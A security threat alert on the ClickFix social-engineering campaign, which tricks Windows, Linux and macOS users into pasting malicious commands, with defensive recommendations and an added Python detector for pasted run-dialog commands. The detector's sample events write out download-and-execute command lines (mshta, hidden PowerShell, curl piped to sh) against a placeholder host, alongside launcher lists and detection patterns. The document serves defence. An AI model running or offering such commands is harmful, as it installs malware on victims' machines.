ClickFix Malware: Campaigns Spread Cross-Platform

A new wave of cyberattacks using the ClickFix social engineering technique is now targeting Linux, expanding from its earlier focus on Windows and macOS. ClickFix deceives users into copying and executing malicious commands under the guise of fixing fake software errors and CAPTCHA tests. It is now used by multiple threat actors to deliver infostealers, remote access trojans, and ransomware.

Threat alert
May 15, 2025

Users are lured through phishing emails, malicious HTML attachments, or malicious JavaScript plugins installed in compromised websites crafted to resemble legitimate services (e.g., Google Meet, Microsoft Word).

Fake error messages prompt users to run malicious commands themselves (e.g., in PowerShell or Linux run dialogs), bypassing traditional security tools. Delivery vectors include compromised websites, fake browser update alerts, phishing emails with HTML attachments, and malicious redirects.

Commands are disguised as system fixes or verification steps; when executed, they download and run malware without triggering browser security warnings. Unlike traditional methods, no direct file download is required. This bypasses web protections like Google Safe Browsing, making it harder to detect and stop.

Cross-Platform Campaign

  • Windows: Users are shown fake full-screen warnings. Clicking “Continue” copies a malicious MSHTA command to the clipboard, launching a loader and a decoy PDF.
  • Linux: Victims click a fake CAPTCHA that places a shell command into the clipboard. They’re instructed to run it via ALT+F2, currently leading to a non-malicious script that fetches an image—likely a test by APT36 for future payload delivery.
  • macOS: Past campaigns used fake Google Meet errors to trick users into installing malware.
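As an added illustration, not part of the original alert, of how a defender might spot the pasted-command step described above on both Windows and Linux: a small Python detector run over constructed process-creation records. The record layout, the parent-process names used to recognise a run dialog, and the hostnames are assumptions, not any product's schema or any real campaign's infrastructure.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """One process-creation record (constructed schema, not any vendor's)."""
    os: str        # "windows" or "linux"
    parent: str    # parent image name
    image: str     # child image name
    cmdline: str   # full command line

# Parents that mean "a human typed this": the Windows Run dialog is a child of
# explorer.exe; ALT+F2 runs under gnome-shell on GNOME and krunner on KDE (assumed).
RUN_DIALOG_PARENTS = {"windows": {"explorer.exe"}, "linux": {"gnome-shell", "krunner"}}
# Interpreters and download tools a ClickFix lure tells the victim to launch.
LAUNCHERS = {
    "windows": {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "curl.exe", "certutil.exe"},
    "linux": {"sh", "bash", "dash", "zsh", "curl", "wget"},
}
URL_RE = re.compile(r"https?://\S+", re.I)
WIN_EVASION_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-e(?:xecutionpolicy|p)\s+bypass|-enc", re.I)
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:sh|bash|dash|zsh)\b")

def clickfix_indicators(ev: ProcEvent) -> list[str]:
    """Return the reasons an event looks like a pasted ClickFix command (empty if none)."""
    reasons = []
    if ev.parent.lower() not in RUN_DIALOG_PARENTS.get(ev.os, set()):
        return reasons                     # not launched from a run dialog: out of scope here
    if ev.image.lower() in LAUNCHERS.get(ev.os, set()):
        reasons.append("interpreter or downloader started from run dialog")
    if URL_RE.search(ev.cmdline):
        reasons.append("command line fetches remote content")
    if ev.os == "windows" and WIN_EVASION_RE.search(ev.cmdline):
        reasons.append("hidden window / policy bypass flags")
    if ev.os == "linux" and PIPE_TO_SHELL_RE.search(ev.cmdline):
        reasons.append("download piped straight into a shell")
    return reasons

def is_clickfix(ev: ProcEvent) -> bool:
    """Alert only when at least two independent indicators line up, to keep noise down."""
    return len(clickfix_indicators(ev)) >= 2

# Constructed sample telemetry; hostnames are placeholders.
SAMPLE_EVENTS = [
    ProcEvent("windows", "explorer.exe", "mshta.exe", "mshta.exe https://lure.example.invalid/fix.hta"),
    ProcEvent("windows", "explorer.exe", "powershell.exe", 'powershell -w hidden -c "iwr https://lure.example.invalid/v"'),
    ProcEvent("linux", "gnome-shell", "sh", "sh -c 'curl -s https://lure.example.invalid/captcha.sh | sh'"),
    ProcEvent("windows", "explorer.exe", "powershell.exe", "powershell.exe"),                  # admin opening a console
    ProcEvent("linux", "gnome-shell", "firefox", "firefox https://docs.example.invalid/"),       # normal browsing
    ProcEvent("windows", "services.exe", "powershell.exe", "powershell -w hidden -File C:\\Tasks\\nightly.ps1"),  # scheduled task, not typed
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        flag = "ALERT" if is_clickfix(ev) else "ok   "
        print(f"{flag} {ev.os:7} {ev.image:15} {'; '.join(clickfix_indicators(ev))}")
```

The parent-process requirement is what makes this specific to ClickFix: the same command line started by a service or scheduler is left to other rules.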

Recommendations

  • Deploy phishing-resistant authentication methods (such as FIDO2 or certificate-based authentication).
  • Enforce least privilege access (PoLP) to minimize the impact of compromised credentials.
  • Turn on Zero-hour Auto Purge (ZAP) to automatically remove malicious emails already delivered to inboxes.
  • Turn on attack surface reduction (ASR) rules in Microsoft Defender for Endpoint to block untrusted or unknown executables, prevent execution of obfuscated or potentially malicious scripts, and block JavaScript/VBScript from launching downloaded executable content.
  • Apply strict software execution policies: prevent installation of unauthorized software, especially fake installers posing as updates or fixes.